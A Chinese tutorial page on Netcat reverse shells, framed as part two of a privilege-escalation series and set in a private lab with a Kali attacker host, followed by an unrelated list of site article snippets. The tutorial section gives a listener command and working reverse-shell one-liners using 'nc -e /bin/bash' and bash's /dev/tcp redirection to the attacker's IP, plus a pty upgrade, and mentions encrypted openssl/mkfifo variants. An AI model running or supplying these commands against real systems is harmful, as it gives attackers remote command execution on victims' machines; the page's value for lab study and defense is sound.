提权(2), Netcat反弹shell

一, 简介

Netcat(nc)是一款网络工具,也被称为“瑞士军刀”,可以读写TCP或UDP网络连接,透过使用TCP或UDP协议的网络连接去读写数据.

它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,它能够建立你需要的几乎所有类型的网络连接Netcat可以用于端口探测、传输文本信息、传输文件/目录、远程电子取证信息收集、远程控制等常用操作

Netcat在Linux环境下常常是自带的,如果你使用的Linux发行版本没有这个工具也可以自行安装,比如在CentOS上的安装命令就是 yum install nc -y

二, 反弹shell实验

环境:

攻击端: 192.168.112.1, kali
目标端: 192.168.112.202

由攻击者监听, 从目标端反弹shell给攻击端.

nc反弹shell

攻击端监听 5555 端口:

nc -lvp 5555

目标端反弹shell:

方式1:

这行命令的作用是使用 Netcat(nc)工具在指定的 IP 地址和端口号上创建一个反向 shell。
具体来说,它将标准输入和标准输出重定向到指定的 TCP连接上,使得远程主机可以通过该连接执行命令并获取输出, 由nc执行bash, 回显给攻击端, 攻击端不显示提示符.

nc -e /bin/bash 192.168.112.1 5555

如果要显示带提示符的交互式终端, 可以继续使用python创建虚拟终端:

python -c 'import pty;pty.spawn("/bin/bash")'
方式2:

这行命令是一个反向 shell 的命令,它将一个 bash shell 连接到指定的 IP 地址和端口号上。
具体来说,它将标准输入和标准输出重定向到一个 TCP连接上,使得远程主机可以通过该连接执行命令并获取输出, 这种方式执行后, 攻击端会显示提示符.

bash -i >& /dev/tcp/192.168.112.1/5555 0>&1
其他方式

还可以使用 telnet, awk, python, php, java等都可以反弹shell.
加密的反弹shell可以使用openssl和mkfifo加密通道.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/193856.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【微信小程序】英文字母不换行问题 flex布局字符超出宽度折行问题:设置了word-break: break-all;和flex: 1;冲突flex不生效问题

flex布局中英文字符超出宽度不会自动折行的问题,但是设置了word-break: break-all;前面设置的flex: 1;就不生效了 1.英文字母不换行问题 .view_text {word-break: break-all; }如果使用flex仅仅设置word-break: break-all;是会影…

【hacker送书活动第7期】Python网络爬虫入门到实战

第7期图书推荐 内容简介作者简介大咖推荐图书目录概述参与方式 内容简介 本书介绍了Python3网络爬虫的常见技术。首先介绍了网页的基础知识,然后介绍了urllib、Requests请求库以及XPath、Beautiful Soup等解析库,接着介绍了selenium对动态网站的爬取和S…

HADOOP::Fsimage和Edits解析

NameNode被格式化之后,将在/opt/module hadoop-3.1.3/data/tmp/dfs/name/curent目录 中产生如下文件 fsimage_ 0000000000000000000 fsimage_ 0000000000000000000.md5 seen_txid VERSION (1) Fsimage文件: HDFS文件系统元数据的一个永久性的检查点&#xff0…

HJ1 字符串最后一个单词的长度

HJ1 字符串最后一个单词的长度 牛客url 描述 计算字符串最后一个单词的长度,单词以空格隔开,字符串长度小于5000。(注:字符串末尾不以空格为结尾) 输入描述: 输入一行,代表要计算的字符串&…

判断二叉树是否为完全二叉树

具体思路: 将二叉树层序遍历(节点)插进队列中,遇到空时就break(退出循环),再重新遍历一遍,若空的后面又再次出现数据,则返回false(不是完全二叉树&#xff0…

基于Java+Swing+Mysql图书管理系统(含实训报告)

基于JavaSwingMysql图书管理系统-含实训报告 一、系统介绍二、功能展示1.用户登陆 四、其他系统实现五、获取源码 一、系统介绍 该系统实现了查看登录界面、主页界面、图书类别管理、用户借阅记录、用户图书查询、用户图书归还、用户信息修改。 运行环境:idea、jd…

C# Spire操作Excel数据透视表

一、概述 数据透视表(Pivot Table)是一种交互式的表,可以进行某些计算,如求和与计数等,可动态地改变透视表版面布置,也可以重新安排行号、列标和页字段。当改变版面布置时,数据透视表也会按照新…

ASP.NET-BS结构的城市酒店入住信息管理系统的设计

2 理论基础 2.1 数据库技术 数据库技术应用中,经常用到的基本概念有:数据库(DB)、数据库管理系统(DBMS)、数据库系统(DBS)、数据库技术及数据模型。 数据库技术是研究数据库的结构、…

基于社区电商的Redis缓存架构-库存模块缓存架构(上)

库存模块缓存架构 我们先来分析一下库存模块的业务场景,分为入库和出库,入库的话,在库存模块中需要添加库存,由于库存也是 写多读多 的场景,那么也是以 Redis 作为主存储,MySQL 作为辅助存储 出库的话&am…

AMBA 5 CHI 协议节点实例和读数据的来源

1. CHI协议节点实例 如上图所示,RN-F、RN-I、HN-F、SN-F、HN-I、SN-I通过内部互联总线连接起来。这里的ICN可以是CMN-700。其中SN-F和SN-I是连接主存,RN-F和HN-F内部都有cache。 2. CHI读数据的可能来源 如上图所示,CHI协议中可能的读数据来…

Win中Redis部署与配置

1.下载msi版本 下载传送门 2.双击next-->next安装安装 3.密码配置以及开机自启 在配置文件中配置相应配置进行配置密码以及端口和ip port 6379指定 Redis 监听端口,默认端口为 6379,作者在自己的一篇博文中解释了为什么选用 6379 作为默认端口&…

初识Linux:保姆级教学,让你一秒记住Linux中的常用指令!

文章目录 前言一、LInux的背景及发展史二、Linux下的基本指令1、ls指令2、pwd指令3、cd指令4、touch指令5、mkdir指令(重要)6、tree指令7、rmdir指令和rm指令(重要)8、man指令(重要)9、cp指令(重…

分享77个焦点幻灯JS特效,总有一款适合您

分享77个焦点幻灯JS特效,总有一款适合您 77个焦点幻灯JS特效下载链接:百度网盘 请输入提取码 提取码:6666 Python采集代码下载链接:采集代码.zip - 蓝奏云 学习知识费力气,收集整理更不易。知识付费甚欢喜&…

Nacos源码解读02——服务事件处理

NotifyCenter通知中心的实现原理和使用 参考https://blog.csdn.net/weixin_42937773/article/details/129105694?spm1001.2014.3001.5502 任务执行引擎的原理和使用 参考https://blog.csdn.net/weixin_42937773/article/details/128892737?spm1001.2014.3001.5502 服务注…

c语言调用free,提示已触发了一个断点。

在用c语言写数据结构的链表的时候,执行也没有什么大错,逻辑也是对的,但是一道free函数会自动触发一个断点。如图: 这个断点产生的原因是由于分配的内存太小了在使用的时候没有任何问题,但是在执行程序的时候&#xff0…

pytest系列——allure之在测试用例添加标题(@allure.title())

前言 通过使用装饰器allure.title可以为测试用例自定义一个更具有阅读性的易读的标题。 allure.title的三种使用方式: 直接使用allure.title为测试用例自定义标题;allure.title支持通过占位符的方式传递参数,可以实现测试用例标题参数化&a…

还搞不懂什么是参数,超参数吗?三分钟快速了解参数与超参数的概念和区别!!!

文章目录 前言一、参数是什么?二、超参数是什么三,常使用的超参数有哪些 前言 参数是模型中可被学习和调整的参数,通过训练数据进行学习和优化; 而超参数则是手动设置的参数,用于控制模型的行为和性能,超…

Java基础之数组拷贝

Arrays.copyOf 详解 copyOf是Arrays类下面的一个方法,用于拷贝各种数组 以整型数组为例:int [ ] copyOf(int [ ]array,int newLength);第一个参数是想要拷贝到数组,第二个参数是新拷贝得到的数组的大小(不一定非得和原始数组大小一样&…

使用 OpenCV 识别和裁剪黑白图像上的白色矩形--含源码

为了仅获取具有特定边框颜色的矩形,我寻求一种替代识别图像中的轮廓和所有矩形的传统方法。如示例图片所示,我有兴趣使用 opencv 仅获取白色边框矩形的坐标。任何这方面的建议将不胜感激。到目前为止,我的代码已产生如下所示的输出。我的下一个目标是将图像裁剪到大的中心框…

深入理解:Class.getResource与ClassLoader.getResource使用区别

深入理解:Class.getResource与ClassLoader.getResource使用区别 一作用:都是使用类的类加载器来读取某个文件,从而获取该文件的URL对象二Class.getResource()方法读取文件:1.若文件路径以“/”开头,则该方法会从classp…